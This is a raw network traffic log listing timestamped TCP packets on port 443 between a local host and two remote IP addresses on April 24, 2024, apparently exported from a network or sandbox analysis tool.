Apr 24, 2024 16:47:59.894408941 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.894423008 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.894455910 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.894475937 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.922949076 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.923013926 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.923028946 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.923044920 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.923073053 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.923104048 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.923733950 CEST	49731	443	192.168.2.4	96.17.209.196
Apr 24, 2024 16:47:59.923754930 CEST	443	49731	96.17.209.196	192.168.2.4
Apr 24, 2024 16:47:59.943360090 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:47:59.943378925 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:47:59.943435907 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:47:59.944945097 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:47:59.944957972 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:00.976459026 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:00.976545095 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:00.987334967 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:00.987370014 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:00.987745047 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:00.987821102 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:00.988161087 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:01.036113977 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:01.628252029 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:01.628340006 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:01.628390074 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:01.628428936 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:01.628452063 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:01.628504992 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:01.630995035 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:01.631026983 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:01.633213997 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:01.633249044 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:01.633342028 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:01.633598089 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:01.633614063 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:02.293715000 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:02.293812990 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:02.294290066 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:02.294303894 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:02.303606987 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:02.303615093 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:03.350800991 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:03.350878954 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:03.350902081 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:03.351002932 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:03.351026058 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:03.351109982 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:03.351109982 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:03.352574110 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:03.352612972 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:03.352677107 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:03.352907896 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:03.352922916 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:03.655272007 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:03.655292988 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:04.010833025 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:04.010960102 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:04.011457920 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:04.011471033 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:04.018840075 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:04.018855095 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:07.590527058 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:07.590585947 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:07.590600014 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:07.590640068 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:07.590663910 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:07.590697050 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:07.590703011 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:07.590747118 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:07.590778112 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:07.590826035 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:07.590987921 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:07.591003895 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:07.593533039 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:07.593570948 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:07.593672037 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:07.593908072 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:07.593930960 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:08.252032995 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:08.252150059 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:08.252888918 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:08.252897978 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:08.254373074 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:08.254379034 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:09.818938017 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:09.819001913 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:09.819094896 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:09.819122076 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:09.819135904 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:09.819176912 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:09.819183111 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:09.819292068 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:09.826149940 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:09.826169014 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:09.905841112 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:09.905935049 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:09.906069994 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:09.906301975 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:09.906325102 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:10.562484980 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:10.562602043 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:10.563088894 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:10.563102961 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:10.564837933 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:10.564843893 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:10.564898014 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:10.564908028 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:10.906213999 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:10.906255960 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:10.906316042 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:10.906667948 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:10.906678915 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:11.564877033 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:11.565004110 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:11.565442085 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:11.565448999 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:11.567174911 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:11.567179918 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:11.654294014 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:11.654406071 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:11.654453039 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:11.654486895 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:11.654520035 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:11.654567003 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:11.655400991 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:11.655427933 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:20.937372923 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:20.937458992 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:20.937472105 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:20.937505007 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:20.937536955 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:20.937563896 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:20.937608957 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:20.937633991 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:20.937650919 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:20.937683105 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:21.725605011 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:21.725630999 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:21.725677013 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:21.725699902 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:21.725717068 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:21.725739956 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:21.725763083 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.115915060 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.115941048 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.115984917 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.116003036 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.116019011 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.116027117 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.116040945 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.116065979 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.464143991 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.464155912 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.464190960 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.464267015 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.464281082 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.464317083 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.464333057 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.557895899 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.557964087 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.558001041 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.558012962 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.558037043 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.558049917 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.795208931 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.795222998 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.795274019 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.795360088 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.795375109 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:22.795397997 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:22.795424938 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.213881969 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.213898897 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.213937998 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.213968039 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.213980913 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.214000940 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.214025021 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.963593006 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.963604927 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.963664055 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.963812113 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.963829994 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.963882923 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.963916063 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.963922977 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.963933945 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.964063883 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.964071035 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.964083910 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.964104891 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.964225054 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.964253902 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.964371920 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.964390039 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.964437008 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:23.964446068 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:23.964483023 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.029608965 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.029633045 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.029906988 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.029922962 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.030035973 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.306582928 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.306608915 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.306667089 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.306687117 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.306711912 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.306721926 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.330183983 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.330204010 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.330252886 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.330267906 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.330291986 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.330307961 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.351959944 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.351985931 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.352018118 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.352027893 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.352070093 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.352070093 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.375122070 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.375139952 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.375185966 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.375196934 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.375221014 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.375232935 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.401266098 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.401295900 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.401331902 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.401340961 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.401355982 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.401453972 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.425776958 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.425806046 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.425862074 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.425872087 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.425899982 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.425934076 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.791564941 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.791594982 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.791670084 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.791686058 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.791731119 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.796870947 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.796896935 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.796953917 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.796972990 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.796983957 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.797024012 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.797039986 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.797050953 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.797060966 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.797075033 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.797087908 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.797137976 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.797137976 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.797146082 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.797183037 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987361908 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987387896 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987438917 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987447977 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987467051 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987481117 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987507105 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987520933 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987534046 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987536907 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987550020 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987570047 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987596035 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987613916 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987631083 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987659931 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987668037 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987680912 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987692118 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987700939 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987714052 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987720013 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:24.987742901 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:24.987782955 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.410043001 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.410053968 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.410096884 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.410193920 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.410213947 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.410233021 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.410239935 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.410253048 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.410388947 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.410397053 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.410454035 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.545559883 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.545584917 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.545645952 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.545665979 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.545686007 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.545790911 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.560482025 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.560501099 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.560544968 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.560554981 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.560573101 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.560580015 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.560592890 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.560597897 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.560611963 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.560626984 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.560657024 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619378090 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619401932 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619478941 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619493961 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619548082 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619568110 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619601965 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619610071 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619622946 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619623899 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619652033 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619661093 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619673014 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619685888 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619698048 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619704962 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619729996 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619731903 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619757891 CEST	49743	443	192.168.2.4	95.217.246.168
